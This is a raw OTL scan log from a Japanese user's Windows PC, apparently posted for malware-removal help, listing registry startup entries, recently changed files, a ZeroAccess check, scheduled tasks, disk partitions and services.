O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\RunOnce: [Application Restart #0] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab (HGPluginJP28 Class)
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab (DMMLauncherAx Control)
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} http://down.hangame.co.jp/jp/installer/HgRunPub.cab (HgRunPub Class)
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab (NeffyLauncherCtl Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab (Creative Software AutoUpdate Support Package)
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab (PubPlugin Class)
O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) - File not found
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell - "" = AutoRun
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell\AutoRun\command - "" = "F:\install.exe"
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Unable to start System Restore Service. Error code 1084

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/04/20 21:58:27 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\herdProtect
[2015/04/20 21:58:26 | 000,000,000 | ---D | C] -- C:\Program Files\Reason
[2015/04/20 21:57:24 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:53:24 | 002,873,112 | ---- | C] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:28:00 | 000,792,056 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/18 19:28:00 | 000,178,168 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/18 19:22:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SysNative\appraiser
[2015/04/16 05:26:09 | 000,085,504 | ---- | C] (Radius Inc.) -- C:\WINDOWS\SysWow64\iccvid.dll
[2015/04/15 04:37:56 | 007,476,032 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/04/15 04:37:56 | 001,733,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/04/15 04:37:55 | 000,950,784 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tdh.dll
[2015/04/15 04:37:55 | 000,749,568 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tdh.dll
[2015/04/15 04:37:55 | 000,411,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tracerpt.exe
[2015/04/15 04:37:55 | 000,369,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tracerpt.exe
[2015/04/15 04:37:55 | 000,360,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/04/15 04:37:55 | 000,285,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64.dll
[2015/04/15 04:37:55 | 000,246,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\microsoft-windows-system-events.dll
[2015/04/15 04:37:55 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64cpu.dll
[2015/04/15 04:37:48 | 001,385,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msctf.dll
[2015/04/15 04:37:47 | 000,780,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\lsm.dll
[2015/04/15 04:37:42 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll
[2015/04/15 04:37:41 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe
[2015/04/15 04:37:40 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll
[2015/04/15 04:37:39 | 000,816,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript.dll
[2015/04/15 04:37:39 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll
[2015/04/15 04:37:39 | 000,664,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript.dll
[2015/04/15 04:37:39 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll
[2015/04/15 04:37:38 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll
[2015/04/15 04:37:38 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll
[2015/04/15 04:36:49 | 002,373,632 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wucltux.dll
[2015/04/15 04:36:49 | 000,133,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuauclt.exe
[2015/04/15 04:36:48 | 000,891,392 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapi.dll
[2015/04/15 04:36:48 | 000,721,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapi.dll
[2015/04/15 04:36:48 | 000,408,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WUSettingsProvider.dll
[2015/04/15 04:36:48 | 000,267,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WinSetupUI.dll
[2015/04/15 04:36:48 | 000,200,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\storewuauth.dll
[2015/04/15 04:36:48 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups.dll
[2015/04/15 04:36:48 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups2.dll
[2015/04/15 04:36:48 | 000,015,360 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wu.upgrade.ps.dll
[2015/04/15 04:36:47 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuwebv.dll
[2015/04/15 04:36:47 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuwebv.dll
[2015/04/15 04:36:47 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wudriver.dll
[2015/04/15 04:36:47 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wudriver.dll
[2015/04/15 04:36:47 | 000,035,840 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapp.exe
[2015/04/15 04:36:47 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapp.exe
[2015/04/15 04:36:47 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wups.dll
[2015/04/15 04:36:31 | 000,377,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\drivers\clfs.sys
[2015/04/15 04:36:31 | 000,075,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\clfsw32.dll
[2015/04/15 04:36:31 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\clfsw32.dll
[2015/04/15 04:36:29 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/04/15 04:36:29 | 000,957,440 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/04/15 04:36:29 | 000,769,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/04/15 04:36:29 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/04/15 04:36:29 | 000,419,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/04/15 04:36:29 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/04/15 04:36:29 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepic.dll
[2015/04/15 04:36:29 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[2015/04/12 01:37:12 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple Computer
[2015/04/10 17:53:01 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple
[2015/04/04 21:24:54 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Malwarebytes
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/04/04 21:24:36 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/04/04 21:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2015/04/04 21:21:57 | 010,285,040 | ---- | C] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:35:46 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Adobe
[2015/04/04 19:27:38 | 000,000,000 | ---D | C] -- C:\Users\ryota\Tracing
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysWow64\GWX
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysNative\GWX
[2015/04/04 18:11:11 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Mario Story (J) [!]
[2015/04/04 18:08:59 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード)
[2015/04/04 17:31:07 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Geek Uninstaller
[2015/04/04 16:36:25 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\geek
[2015/04/04 16:33:36 | 000,050,688 | ---- | C] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/02/02 23:25:12 | 000,782,480 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\AradIns.exe
[2015/02/02 23:24:38 | 000,584,336 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\NeopleCustomURLStarter.exe
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/04/21 01:45:52 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/04/21 01:43:44 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/04/21 01:43:39 | 2474,680,319 | -HS- | M] () -- C:\hiberfil.sys
[2015/04/21 01:41:35 | 000,002,196 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/04/21 01:40:21 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 00:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/21 00:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/20 22:35:30 | 000,000,020 | ---- | M] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2015/04/20 21:58:27 | 000,001,140 | ---- | M] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:54:14 | 002,873,112 | ---- | M] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:31:33 | 001,496,524 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/04/18 19:31:33 | 000,722,278 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/04/18 19:31:33 | 000,499,650 | ---- | M] () -- C:\WINDOWS\SysNative\perfh011.dat
[2015/04/18 19:31:33 | 000,135,458 | ---- | M] () -- C:\WINDOWS\SysNative\perfc011.dat
[2015/04/18 19:31:33 | 000,135,394 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/04/16 05:31:51 | 000,215,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msclmd.dll
[2015/04/16 05:31:51 | 000,195,072 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msclmd.dll
[2015/04/14 08:24:21 | 000,792,056 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/14 08:24:21 | 000,178,168 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/04 21:39:57 | 000,001,132 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/04 21:23:16 | 010,285,040 | ---- | M] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:51:47 | 000,001,098 | ---- | M] () -- C:\Users\ryota\Application Data\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job
[2015/04/04 19:25:29 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/04/04 16:38:09 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/04 16:33:39 | 000,050,688 | ---- | M] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/03/24 06:59:25 | 001,733,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/03/24 06:59:25 | 000,360,480 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/03/24 06:59:00 | 007,476,032 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/03/23 07:45:41 | 000,227,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/03/23 07:09:23 | 000,726,528 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/03/23 07:09:22 | 001,111,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/03/23 07:09:22 | 000,957,440 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/03/23 07:09:22 | 000,769,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/03/23 07:09:22 | 000,419,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/03/23 07:09:22 | 000,030,720 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/04/20 21:58:27 | 000,001,140 | ---- | C] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysWow64\ieuinit.inf
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysNative\ieuinit.inf
[2015/04/04 21:24:37 | 000,001,132 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/03/15 00:01:07 | 000,107,008 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2015/03/14 23:59:54 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2015/03/02 14:09:57 | 000,000,020 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2014/11/19 17:11:37 | 000,000,242 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/10/01 19:54:10 | 000,183,808 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2014/10/01 19:54:10 | 000,143,360 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2014/09/24 15:58:21 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/02/15 00:25:26 | 000,645,632 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidcore.dll
[2014/02/15 00:25:26 | 000,240,640 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidvfw.dll
[2014/02/15 00:25:25 | 000,079,360 | ---- | C] () -- C:\WINDOWS\SysWow64\ff_vfw.dll
[2014/02/15 00:25:17 | 000,178,688 | ---- | C] () -- C:\WINDOWS\SysWow64\unrar.dll
[2014/02/15 00:25:15 | 000,715,038 | ---- | C] () -- C:\WINDOWS\unins000.exe
[2014/02/15 00:25:15 | 000,216,064 | ---- | C] ( ) -- C:\WINDOWS\SysWow64\lagarith.dll
[2014/02/15 00:25:15 | 000,001,990 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2013/10/28 17:28:07 | 000,188,416 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_core.dll
[2013/10/28 17:28:07 | 000,069,632 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_vcm.dll
[2013/09/15 16:04:47 | 000,000,189 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\WB.CFG
[2013/08/23 00:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/23 00:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 23:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 16:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/22 08:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/22 08:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/12/18 00:56:03 | 001,161,682 | ---- | C] () -- C:\Users\ryota\記録されたゲーム - 17-12-2012 10`00`02.mgx
[2012/12/13 15:28:00 | 012,706,828 | ---- | C] () -- C:\Users\ryota\03 Another Heaven.mp3
[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Kaleidoscope(transparent mix|Bonus Track).mp3
[2012/12/13 15:28:00 | 009,962,152 | ---- | C] () -- C:\Users\ryota\05 ARCADIA-Instrumental-.mp3
[2012/12/13 15:28:00 | 009,877,588 | ---- | C] () -- C:\Users\ryota\02 HORIZON.mp3
[2012/12/13 15:28:00 | 009,842,092 | ---- | C] () -- C:\Users\ryota\01 ARCADIA.mp3
[2012/12/13 15:28:00 | 003,751,396 | ---- | C] () -- C:\Users\ryota\04 ARCADIA-game Ver.-.mp3
[2012/10/31 18:22:16 | 000,003,077 | ---- | C] () -- C:\ProgramData\cfSB1290.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2015/04/20 22:45:57 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 02:40:58 | 022,291,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 02:34:06 | 019,731,824 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2014/10/29 10:19:43 | 001,013,760 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2014/10/29 09:59:23 | 000,786,944 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2014/10/29 10:16:01 | 000,512,512 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/04/21 00:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/21 01:40:21 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 00:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000AAKX-00ERMA0
Partitions: 5
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE1 -
Interface type: USB
Media Type:
Model: Multi Flash Reader USB Device
Partitions: 0
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 300.00MB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: GPT: System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 315621376
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 8.00GB
Starting Offset: 554696704
Hidden sectors: 0


DeviceID: Disk #0, Partition #3
PartitionType: GPT: Basic Data
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 457.00GB
Starting Offset: 8943304704
Hidden sectors: 0


DeviceID: Disk #0, Partition #4
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 456.00MB
Starting Offset: 499629686784
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2014/10/29 11:42:20 | 000,214,528 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:33 | 000,110,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2014/10/29 10:21:02 | 000,096,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:34 | 000,933,376 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:40 | 000,845,312 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
